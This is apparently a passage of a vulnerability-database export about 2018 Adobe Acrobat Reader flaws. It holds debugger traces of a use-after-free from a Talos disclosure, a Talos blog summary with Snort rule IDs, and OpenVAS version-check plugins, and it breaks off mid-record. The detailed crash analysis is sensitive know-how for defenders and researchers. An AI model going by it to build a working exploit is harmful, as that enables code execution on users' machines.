EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n \n\nSetting a write access breakpoint on 
the dword where the final dereferenced pointer is stored reveals where it comes from:\n \n \n 0:000> ba w 4 292c2ffc\n 0:000> dd 292c2ffc\n 0:000> g\n Breakpoint 6 hit\n eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\n eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n Annots!PlugInMain+0x205507:\n 55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\n 0:000> dd 292c2ffc\n 292c2ffc 29d26fe0 ???????? ???????? ????????\n 0:000> !heap -p -a 29d26fe0\n address 29d26fe0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 558e22e7 Annots!PlugInMain+0x0009e3e6\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 
AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\n \n\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\n \n \n (c20.5e8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\n eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\n 0:000> dd ebx\n 29d26fe0 ???????? ???????? ???????? ????????\n 29d26ff0 ???????? ???????? ???????? ????????\n 29d27000 ???????? ???????? ???????? ????????\n 29d27010 ???????? ???????? ???????? ????????\n 29d27020 ???????? ???????? ???????? ????????\n 29d27030 ???????? ???????? ???????? ????????\n 29d27040 ???????? ???????? ???????? ????????\n 29d27050 ???????? ???????? ???????? ????????\n \n\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. 
With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\n\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0518\n\nPrevious Report\n\nTALOS-2017-0501\n", "edition": 6, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0517", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-05-15T21:13:57", "bulletinFamily": "blog", "cvelist": ["CVE-2018-4947", "CVE-2018-4996"], "description": "_Discovered by Aleksandar Nikolic of Cisco Talos_ \n \n_Update 05/15/18_: The CVE for TALOS-2018-0517 has been corrected below. \n\n\n## Overview\n\n \nToday, Talos is releasing details of a new vulnerabilities within Adobe Acrobat Reader DC. Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. \n \nA specific Javascript script embedded in a PDF file can cause the document ID field to be used in an unbounded copy operation leading to stack-based buffer overflow when opening a specially crafted PDF document in Adobe Acrobat Reader DC 2018.009.20044. 
This stack overflow can lead to return address overwrite which can result in arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. \n \n\n\n### TALOS-2018-0517 - Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability (CVE-2018-4996)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517>). \n \n\n\n### TALOS-2018-0518 - Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability (CVE-2018-4947)\n\n \nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page. Detailed vulnerability information can be found [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518>). \n \n\n\n## Known vulnerable versions\n\n \nAdobe Acrobat Reader DC 2018.009.20044 \n \n\n\n## Coverage\n\n \nThe following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45506-45507, 45521-45522 \n", "modified": "2018-05-15T20:38:52", "published": "2018-05-15T06:51:00", "id": "TALOSBLOG:C087C65FAEEB57D382F9DD6FD51D549C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/wlCWZuun2rs/multiple-acrobat-reader-vulns.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Adobe Acrobat Reader DC Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-07-17T14:17:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-16T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813230", "type": "openvas", "title": "Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813230\");\n script_version(\"2019-07-16T10:51:36+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", 
\"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-16 10:51:36 +0000 (Tue, 16 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017 before 2017.011.30080 on\n MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30080 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"17.011.30080 (2017.011.30080)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", 
"CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813239", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-MAC OS X\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813239\");\n script_version(\"2019-07-05T08:21:18+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:21:18 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Mac OS X\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic 
Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on MAC OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"15.006.30418\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 
10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813231", "type": "openvas", "title": "Adobe Reader 2017 Security Updates(apsb18-09)-Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Reader 2017 Security Updates(apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813231\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4996\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:36 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader 2017 Security Updates(apsb18-09)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is 
installed with Adobe Reader 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat Reader 2017 prior to version\n 2017.011.30080 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat Reader 2017 version\n 2017.011.30080 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30079\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30080\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:17:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310813238", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813238", "type": "openvas", "title": "Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09) - Windows", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Acrobat DC (Classic Track) Security Updates (apsb18-09)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License 